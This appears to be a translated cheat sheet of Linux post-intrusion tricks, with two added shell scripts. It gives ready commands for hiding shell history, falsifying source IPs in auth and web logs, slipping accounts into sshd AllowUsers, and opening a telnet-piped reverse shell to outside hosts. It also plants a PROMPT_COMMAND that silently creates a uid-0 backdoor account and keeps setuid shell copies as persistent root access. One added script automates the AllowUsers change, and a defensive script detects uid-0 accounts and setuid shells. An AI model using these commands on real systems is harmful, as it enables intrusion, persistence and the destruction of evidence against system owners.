1. Do not record history after logging in over ssh
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0
Pointing HISTFILE at /dev/null and zeroing HISTSIZE keeps bash from writing this session's commands to ~/.bash_history. It only affects the current shell; anything already written stays on disk.
2. Some evil uses of sed
Rewriting the logon IP and the access IP in the logs in place:
sed -i 's/211.xxx/192.168.1.1/g' access_log access.log security
Here 211.xxx stands for the real source address and -i edits the files in place. On Red Hat-style systems sshd logon records are in /var/log/secure and web requests in the Apache access_log.
Attackers can also add themselves to an sshd AllowUsers restriction:
sed -i 's/AllowUsers fuck/AllowUsers fuck root oracle rqcuser/g' sshd_config
fuck is the account already on the AllowUsers line; root, oracle and rqcuser are appended after it.
However, sshd reads sshd_config only when it starts, so after this edit it has to be made to reload. Find the listening sshd's process ID with lsof -i :22:
# lsof -i :22
COMMAND   PID   USER  FD   TYPE  DEVICE    SIZE  NODE  NAME
sshd    18662   root  11u  IPv6  27925867        TCP   *:ssh (LISTEN)
sshd    31793   sshd  12u  IPv6  34742994        TCP   192.168.1.2:ssh->192.168.1.5:49080 (ESTABLISHED)
Then kill -SIGHUP 18662. Signal the listener (PID 18662, the line marked LISTEN), not a per-connection child such as 31793: on SIGHUP the listening sshd re-executes itself with the new configuration and existing sessions stay up. Check the file with sshd -t first; if the edited configuration does not parse, the re-executed sshd exits and port 22 stops listening.
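The sed line above only works when AllowUsers already lists exactly one known user. The shell function below, added here as an example and not code from the original page, appends users to whatever AllowUsers line exists, creates the line when there is none, skips names that are already present, and prints the resulting directive so it can be checked before sshd is signalled. The function name allow_users and the sample configuration are assumptions for this example.

```shell
#!/bin/sh
# Added example: maintain the AllowUsers line of an sshd_config.
# allow_users CONFIG USER... : make sure every USER is on the AllowUsers line.
allow_users() {
    cfg=$1; shift
    if grep -q '^AllowUsers ' "$cfg"; then
        for u in "$@"; do
            # append only names that are not already on the line
            if ! grep -qE "^AllowUsers( [^ ]+)* $u( |\$)" "$cfg"; then
                # & in the replacement is the whole matched line
                sed "s/^AllowUsers .*/& $u/" "$cfg" > "$cfg.tmp" && mv "$cfg.tmp" "$cfg"
            fi
        done
    else
        # no restriction yet: create one listing the given users
        printf 'AllowUsers %s\n' "$*" >> "$cfg"
    fi
    grep '^AllowUsers ' "$cfg"
}

# Constructed sample standing in for /etc/ssh/sshd_config (assumption).
demo_allow_users() {
    tmp=$(mktemp)
    printf 'Port 22\nAllowUsers fuck\nPermitRootLogin yes\n' > "$tmp"
    allow_users "$tmp" root oracle rqcuser
    rm -f "$tmp"
}

demo_allow_users
# Real use: allow_users /etc/ssh/sshd_config root oracle rqcuser
#           && sshd -t && kill -HUP <listener PID from lsof -i :22>
```

Running the demo prints `AllowUsers fuck root oracle rqcuser`. The `sshd -t` step matters: sshd re-executes itself on SIGHUP, and a configuration it cannot parse leaves no listener behind.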
3. Get a real tty shell after a webshell bounces a shell back
python -c 'import pty; pty.spawn("/bin/sh")'
Another method to obtain a tty shell, using expect:
$ cat sh.exp
#!/usr/bin/expect
# Spawn a shell, then allow the user to interact with it.
# The new shell will have a good enough TTY to run tools like ssh, su and login
spawn sh
interact
expect sh.exp
Run it with expect (or chmod +x sh.exp and execute it directly); bash cannot interpret spawn and interact.
4. Perform reverse connections via telnet:
telnet [attacker_ipaddr] [port1] | /bin/bash | telnet [attacker_ipaddr] [port2]
telnet 210.51.173.41 8080 | /bin/bash | telnet 210.51.173.41 8081
/usr/bin/telnet 203.93.28.236 8000 | /bin/bash | /usr/bin/telnet 203.93.28.236 8001
Run the following on 203.93.28.236 beforehand, in two separate terminals:
nc -l -p 8000
nc -l -p 8001
Commands typed into the 8000 listener are fed to /bin/bash on the target, and bash's output arrives at the 8001 listener. Only stdout travels back through the second telnet; add 2>&1 after /bin/bash to see error messages too.
/usr/bin/telnet 192.168.1.100 8088 | /bin/bash | /usr/bin/telnet 192.168.1.100 8089
5. curl download (resumable)
The full command should look something like this:
curl -C - -O http://www.mirror.com/path/to/NeoOffice-Patch.dmg
-C - resumes an interrupted transfer from the size of the existing local file; -O saves it under the remote file name.
6. When nc on Windows is the listener and a Linux shell connects back, ls output does not line-break properly. The usual cause is the ls --color alias, whose escape sequences the Windows console shows raw; remove the alias:
unalias ls
7. Linux bash privilege escalation via PROMPT_COMMAND
export PROMPT_COMMAND="/usr/sbin/useradd -o -u 0 kkoo &>/dev/null; echo kkoo:123456 | /usr/sbin/chpasswd &>/dev/null; unset PROMPT_COMMAND"
bash runs PROMPT_COMMAND before it prints each prompt. Planted where a root shell will pick it up (for example /etc/profile or root's .bashrc), the next time root opens an interactive shell it silently creates the account kkoo with uid 0 (-o permits the duplicate uid), sets its password, and then unsets itself so it runs once. It does nothing useful in an unprivileged shell, since useradd and chpasswd require root.
8. ssh tunnel
ssh -C -f -N -g -L listen_port:DST_Host:DST_port user@Tunnel_Host
ssh -C -f -N -g -R listen_port:DST_Host:DST_port user@Tunnel_Host
ssh -C -f -N -g -D listen_port user@Tunnel_Host
-C compresses the tunnel, -f sends ssh to the background after authentication, -N runs no remote command, and -g lets hosts other than localhost connect to the listening port. -L listens on the local machine and forwards to DST_Host:DST_port as seen from Tunnel_Host; -R listens on Tunnel_Host and forwards back through the client to DST_Host:DST_port; -D opens a local SOCKS proxy on listen_port whose connections exit through Tunnel_Host.
9. Local rootshell
A setuid copy of bash or tcsh won't work, because they drop the effective uid when it differs from the real uid (bash keeps it only when started with -p); ash, bsh, zsh and ksh do work. The operation is simple. Taking ksh: cp /bin/ksh .; chown root.root ksh; chmod 4755 ksh, then run ./ksh to obtain root permission. Setting it up needs root once (chown to root is a root-only operation); afterwards it hands root back on demand. This looks crude, but it is sometimes useful. Consequently, deleting superfluous shells raises the cost of an intrusion to some extent. If you have not yet left yourself a shell, consider adding this step.
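The defender's side of items 7 and 9 is two checks: extra uid-0 accounts in the passwd file, and setuid files that are byte-for-byte copies of a system shell, which catches a copied ksh even when it has been renamed. The script below is an added example, not code from the original page; the function names, the constructed passwd lines and the directory used in the demo are assumptions made for it.

```shell
#!/bin/sh
# Added example: spot the leftovers of the PROMPT_COMMAND user trick (item 7)
# and of a setuid shell copy (item 9).

# uid0_accounts PASSWD_FILE : print every account other than root whose uid is 0.
uid0_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# setuid_shell_copies DIR SHELL... : print setuid files under DIR whose contents
# are identical to one of the given shell binaries (renamed copies included).
setuid_shell_copies() {
    dir=$1; shift
    find "$dir" -type f -perm -4000 2>/dev/null | while read -r f; do
        for s in "$@"; do
            [ -f "$s" ] && cmp -s "$f" "$s" && echo "$f (copy of $s)"
        done
    done
}

# Demo on constructed data: a passwd file with a planted uid-0 user and a
# directory holding a setuid copy of /bin/sh under another name (assumptions).
demo_checks() {
    pw=$(mktemp)
    printf 'root:x:0:0:root:/root:/bin/bash\n' > "$pw"
    printf 'kkoo:x:0:0::/home/kkoo:/bin/bash\n' >> "$pw"
    printf 'bob:x:1000:1000::/home/bob:/bin/bash\n' >> "$pw"
    d=$(mktemp -d)
    cp /bin/sh "$d/.cache" && chmod 4755 "$d/.cache"
    echo "uid-0 accounts besides root:"; uid0_accounts "$pw"
    echo "setuid shell copies:"; setuid_shell_copies "$d" /bin/sh
    rm -rf "$pw" "$d"
}

demo_checks
# Real use: uid0_accounts /etc/passwd
#           setuid_shell_copies / /bin/sh /bin/bash /bin/ksh /bin/zsh /bin/ash
```

In real use add `-user root` to the find to restrict the search to the files that actually grant root, and run it from a known-good system or rescue image, since a planted shell may come with a replaced find or cmp.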